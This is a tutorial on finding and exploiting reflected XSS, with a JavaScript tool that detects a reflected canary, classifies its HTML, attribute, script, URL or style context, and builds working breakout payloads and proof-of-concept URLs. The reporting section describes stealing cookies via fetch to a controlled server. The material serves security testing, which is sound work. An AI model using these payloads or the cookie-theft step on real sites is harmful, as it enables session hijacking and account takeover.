Reflected XSS in practice — context is everything
Reflected XSS happens when a request parameter is echoed back into the response in a way that lets the attacker inject script. The hunt starts with detecting the reflection itself, which is best done with a unique canary: a random alphanumeric tag you can search for, wrapped around one of each character that is special in a common context (a single quote, a double quote, angle brackets and a backslash). The tag tells you whether the value is reflected at all; the special characters tell you which of them the application encodes or strips on the way back, and that decides whether a breakout is possible.
Detecting the reflection
Send the canary as the value of every parameter the page reads and search the raw response (not the browser's rendered DOM, which normalizes markup and hides the encoding) for the alphanumeric tag. Note exactly where it lands: in the HTML body, inside an attribute value delimited by single quotes, double quotes or nothing at all, inside a JavaScript string literal, in a URL-valued attribute such as href or src, or inside a style block. Then note which of the special characters came back unencoded. Each context demands a different sequence to break out, and the working payload depends on both the context you landed in and the characters that survived.
Context-aware payloads
Inside the HTML body, an SVG with an onload handler is the modern default, since it dodges blocklists tuned to script tags and fires without user interaction. Inside an attribute value, you close the value with whichever quote delimits it (a single quote for a single-quoted attribute), then add an event handler such as onmouseover, or autofocus with onfocus; an unquoted value is ended by a space. Inside a JavaScript string literal, you close the literal with the same quote that opened it (a double quote for a double-quoted string), terminate the statement with a semicolon, and comment out the rest of the line so the script still parses. If the quotes are encoded but angle brackets survive, a closing </script> tag followed by a body payload works whatever the JavaScript context, because the HTML parser ends the script element before any JavaScript is parsed. In a URL position, the javascript: scheme is the classic, but it only fires where the URL is actually navigated (a link href, a form action, an iframe src), not in an img src. Inside a style block, you close the style tag and proceed as in body context.
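The detection and payload steps above, worked through as an added example that is not part of this article: the templates are constructed stand-ins for a server that reflects a parameter into each context, and target.example is a hypothetical host. It goes a little beyond the text by handling unquoted attribute values, falling back to the </script> breakout when quotes are encoded, and reporting no payload at all when the characters a breakout needs did not survive.

```javascript
// Added example (not from the article): classify the context a canary lands in
// and build the matching breakout payload. The server templates below are
// constructed stand-ins for a target, and the URL in run() is hypothetical.
const PREFIX = "zxq7", SUFFIX = "7qxz";        // random-looking tags to search for
const SPECIALS = `'"<>\\`;                      // one of each context-breaking char
const CANARY = PREFIX + SPECIALS + SUFFIX;      // zxq7'"<>\7qxz

const htmlEscape = (s) =>
  s.replace(/[&<>"']/g, (c) => ({ "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" }[c]));

// Constructed templates: each one reflects the parameter into a different context.
const TEMPLATES = {
  body:       (q) => `<h1>Results for ${q}</h1>`,
  safeBody:   (q) => `<h1>Results for ${htmlEscape(q)}</h1>`,   // encodes, so no breakout
  attrSingle: (q) => `<input name="q" value='${q}'>`,
  attrDouble: (q) => `<input name="q" value="${q}">`,
  jsString:   (q) => `<script>var last = "${q}";</script>`,
  url:        (q) => `<a href="${q}">back</a>`,
  style:      (q) => `<style>.hit { color: ${q}; }</style>`,
};
const URL_ATTRS = new Set(["href", "src", "action", "formaction", "xlink:href"]);

// Which quote (if any) is still open at the end of a JS snippet, honouring backslash escapes.
function unclosedQuote(code) {
  let open = null;
  for (let k = 0; k < code.length; k++) {
    const c = code[k];
    if (open) { if (c === "\\") k++; else if (c === open) open = null; }
    else if (c === '"' || c === "'" || c === "`") open = c;
  }
  return open;
}

// Locate the canary in a raw response and report its context plus the
// special characters that came back unencoded.
function classify(html) {
  const i = html.indexOf(PREFIX);
  const j = i < 0 ? -1 : html.indexOf(SUFFIX, i);
  if (i < 0 || j < 0) return null;                      // not reflected at all
  const reflected = html.slice(i + PREFIX.length, j);
  const survivors = [...SPECIALS].filter((c) => reflected.includes(c)).join("");
  const before = html.slice(0, i);
  for (const tag of ["script", "style"]) {              // inside a raw-text element?
    if (before.lastIndexOf("<" + tag) > before.lastIndexOf("</" + tag)) {
      if (tag === "style") return { context: "style", quote: null, survivors };
      const code = before.slice(before.lastIndexOf("<script"));
      const quote = unclosedQuote(code.slice(code.indexOf(">") + 1));
      return { context: quote ? "jsString" : "jsCode", quote, survivors };
    }
  }
  if (before.lastIndexOf("<") > before.lastIndexOf(">")) {   // inside a start tag
    const m = before.slice(before.lastIndexOf("<")).match(/([\w:-]+)\s*=\s*(["']?)[^"']*$/);
    const attr = m ? m[1].toLowerCase() : null, quote = m && m[2] ? m[2] : null;
    return { context: URL_ATTRS.has(attr) ? "url" : "attr", attr, quote, survivors };
  }
  return { context: "body", quote: null, survivors };
}

// Breakout for the detected context, or null when the needed characters were encoded.
function payloadFor(p) {
  const ok = (chars) => [...chars].every((c) => p.survivors.includes(c));
  switch (p.context) {
    case "body":  return ok("<>") ? "<svg onload=alert(1)>" : null;
    case "style": return ok("<>") ? "</style><svg onload=alert(1)>" : null;
    case "url":   return "javascript:alert(1)";             // fires only where the URL is navigated
    case "attr":
      if (!p.quote) return " onmouseover=alert(1) x";       // unquoted value: a space ends it
      return ok(p.quote) ? `${p.quote} onmouseover=alert(1) x=${p.quote}` : null;
    case "jsString":
      if (ok(p.quote)) return `${p.quote};alert(1);//`;     // close the literal, end the statement
      return ok("<>") ? "</script><svg onload=alert(1)>" : null; // HTML parser ends <script> first
    case "jsCode": return "alert(1)";
    default: return null;
  }
}

// Probe every constructed template and pair each finding with its payload.
function run() {
  const out = {};
  for (const [name, render] of Object.entries(TEMPLATES)) {
    const probe = classify(render(CANARY));
    const payload = probe ? payloadFor(probe) : null;
    out[name] = { ...probe, payload,
      // hypothetical target URL; encode so &, # and + survive the query string
      pocUrl: payload ? "https://target.example/search?q=" + encodeURIComponent(payload) : null };
  }
  return out;
}

console.log(JSON.stringify(run(), null, 2));
```

The classifier works on the raw response text rather than a parsed DOM on purpose: the browser's parser would already have consumed or normalized the quotes and brackets you are trying to observe. The safeBody template shows the negative case, where only the backslash survives encoding and payloadFor correctly returns no payload.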
Reporting
A single working alert popup is a proof of concept, but the severity bumps if you also demonstrate session theft or a privileged action. A short fetch to a server you control carrying document.cookie shows session theft, but only for cookies set without the HttpOnly flag; if the session cookie is HttpOnly, show impact instead with a fetch that includes credentials and performs a state-changing action such as a profile update on behalf of the victim, or that reads a page containing the victim's data. Run the demonstration against your own test account so no third-party data leaves the target. Either form of demonstrated impact typically lifts the report from medium into high.